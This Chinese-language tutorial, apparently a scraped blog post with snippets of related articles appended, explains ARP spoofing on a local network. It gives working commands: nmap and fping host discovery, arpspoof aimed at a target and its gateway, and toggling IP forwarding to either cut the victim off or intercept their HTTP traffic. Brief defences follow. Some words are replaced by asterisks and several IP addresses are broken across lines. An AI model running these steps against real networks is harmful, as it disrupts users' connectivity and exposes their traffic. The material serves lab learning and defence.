在區域網中,網路中實際傳輸的是「幀
」,幀裡面是有目標主機的mac位址的。在乙太網中,乙個主機要和另乙個主機進行直接通訊,必須要知道目標主機的mac位址。mac位址就是arp協議
獲得的。其實就是主機在傳送幀前將目標ip位址轉換成目標mac位址的過程。arp協議的基本功能就是通過目標裝置的ip位址,查詢目標裝置的mac位址,以保證通訊的順利進行。所以說從某種意義上講arp協議是工作在更低於ip協議的協議層。這也是為什麼arp欺騙更能夠讓人在神不知鬼不覺的情況下出現網路故障,危害會很隱蔽。
arp攻擊就是通過偽造ip位址和mac位址實現arp欺騙,能夠在網路中產生大量的arp通訊量,攻擊者只要持續不斷的發出偽造的arp響應包就能更改目標主機arp快取中的ip-mac
條目,造成網路中斷或中間人攻擊。
當區域網中一台機器,反覆向其他機器,特別是向閘道器,傳送這樣無效假冒的arp應答資訊包時,嚴重的網路堵塞就會開始。由於閘道器mac位址錯誤,所以從網路中計算機發來的資料無法正常發到閘道器,自然無法正常上網。這就造成了無法訪問外網的問題,由於很多時候閘道器還控制著我們的區域網lan上網,所以這時我們的lan訪問也就出現問題了。
可以使用nmap命令尋找存活主機
也可以使用fping探測一下
使用命令檢視一下當前的閘道器
cat /etc/resolv.conf
下面開始斷網攻擊,使用arpspoof
工具,工具使用方法:
arpspoof -i 網絡卡 -t 目標ip 閘道器
export path=
"/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
linux修改環境變數
開啟斷網攻擊
arpspoof -i eth0 -t 192.168
.186
.131
192.168
.186
.2
arp欺騙攻擊是冒充閘道器向目標主機傳送假的arp資料報。
攻擊流程
獲取目標主機的流量
獲取流量之後進行**
相當於乙個中間人,可以在中途攔截一下流量,這樣所有的流量都會被監控,
開啟ip**功能
cat /proc/sys/net/ipv4/ip_forward
echo 1
>
/proc/sys/net/ipv4/ip_forward**發)
#echo 代表寫入
這樣可以實現流量**,而不是截斷流量
如果要截斷流量,寫入0即可
#截斷流量
echo 0
>
/proc/sys/net/ipv4/ip_forward(斷網)
欺騙攻擊
arpspoof -i eth0 -t 192.168
.186
.2192.168
.186
.131
#閘道器在前,ip在後
接下來開啟另乙個終端,使用一下
經過測試,只能捕捉目標主機在瀏覽http**的時候可以攔截流量,訪問https則不行。
這裡稍微補充一下http和https
http是一種發布和接收 html 頁面的方法,被用於在 web 瀏覽器和**伺服器之間傳遞資訊。
http 協議以明文方式傳送內容,不提供任何方式的資料加密,如果攻擊者擷取了web瀏覽器和**伺服器之間的傳輸報文,就可以直接讀懂其中的資訊。
https 經由 http 進行通訊,但利用 ssl/tls 來加密資料報。https 開發的主要目的,是提供對**伺服器的身份認證,保護交換資料的隱私與完整性。
https(ssl+http) 資料傳輸過程是加密的,安全性較好。
在arp快取記憶體中的表項一般都要設定超時值,縮短這個這個超時值能夠有用的避免arp表的溢位。
每台主機都有乙個暫時寄存ip-mac的對應表arp攻擊就經過更改這個快取來到達詐騙的意圖,運用靜態的arp來繫結正確的mac是乙個有用的辦法,在命令列下運用arp -a能夠檢查當時的arp快取表。
在某個正常的時間,做乙個ip和mac對應的資料庫,以後定時檢查當時的ip和mac對應聯絡是否正常,定時檢查交流機的流量列表,檢查丟包率。
區域網內ARP中間人攻擊
以前一直想做的就是隨意監聽和竊取,像電影一樣的黑客行為,但是發現很難。很久以前就知道一句話區域網內無私隱,我們就來做一次區域網內的東西 這是乙個根據ip位址獲取實體地址的乙個tcp ip協議。當乙個區域網中有很多臺主機時,假如pc1要和pc2進行通訊,但是pc1只知道pc2的ip位址,而不知道pc2...
ARP欺騙攻擊
中間人攻擊 arp毒化 heee 2012 07 30 共1962446人圍觀 發現 23 個不明物體 系統安全 感謝heee投遞 中間人攻擊雖然古老,但仍處於受到黑客攻擊的危險中,可能會嚴重導致危害伺服器和使用者。仍然有很多變種的中間人攻擊是有效的,它們能夠很容易的欺騙外行並且入侵他們。正如字面意...
ARP欺騙攻擊
由於區域網的網路流通不是根據ip位址進行,而是根據mac位址進行傳輸。所以,mac位址在a上被偽造成乙個不存在的mac位址,這樣就會導致網路不通,a不能ping通c 這就是乙個簡單的arp欺騙。假設乙個網路環境中,網內有三颱主機,分別為主機a b c。主機詳細資訊如下描述 a的位址為 ip 192....